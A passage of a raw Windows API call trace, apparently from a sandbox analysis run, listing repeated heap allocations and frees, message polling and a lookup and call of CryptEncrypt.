hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0165.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0165.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0165.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0165.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0165.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0165.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0165.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0165.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0165.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0165.925] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0165.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0165.925] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0165.925] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0165.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0165.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0165.926] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0165.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0165.926] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0165.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0165.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0165.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0165.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0165.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0165.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0165.926] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0165.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0165.926] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0165.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0165.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0165.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0165.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0165.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0165.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0165.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0165.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0165.927] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0165.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0165.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0165.927] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0165.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0165.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0165.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0165.927] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.927] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0165.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0165.927] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0165.927] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.927] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0165.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0165.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0165.928] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0165.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0165.928] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0165.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0165.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0165.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0165.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0165.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0165.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0165.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0165.928] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0165.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0165.928] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0165.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0165.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0165.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0165.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0165.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0165.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0165.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0165.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0165.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0165.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0165.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0165.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0165.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0165.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0165.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0165.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0165.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0165.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0165.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0165.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0165.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0165.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0165.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0165.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34d8fa0 | out: hHeap=0x25c0000) returned 1 [0165.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0165.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0165.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0165.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0165.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0165.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0165.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0165.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0165.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.931] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0165.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0165.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0165.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0165.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0165.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0165.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0165.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0165.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0165.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0165.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0165.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0165.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0165.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0165.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0165.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0165.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0165.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0165.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0165.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0165.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0165.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0165.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0165.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0165.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0165.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0110 | out: hHeap=0x25c0000) returned 1 [0165.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0165.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0165.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0165.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0165.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0165.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0165.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0165.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0165.933] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0165.933] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x34aa3a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0165.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0165.933] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0165.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0165.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0165.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1c) returned 0x24b6c88 [0165.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0165.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00c0 [0165.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0165.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0150 [0165.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0160 [0165.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0165.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0165.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0165.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0165.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0165.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0150 | out: hHeap=0x25c0000) returned 1 [0165.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0160 | out: hHeap=0x25c0000) returned 1 [0165.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0165.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0165.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0165.934] CryptEncrypt (in: hKey=0xaa55e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x136a0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x136a8) returned 1 [0165.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0165.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0165.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0165.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0165.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0165.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0165.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0165.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0165.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0165.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0165.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0165.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0165.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0165.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0165.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0165.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0165.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0165.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0165.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0165.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0165.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0165.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0165.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0165.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0165.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0165.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0165.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0165.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0165.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0165.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0165.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0165.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0165.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0165.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0165.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0165.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0165.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: 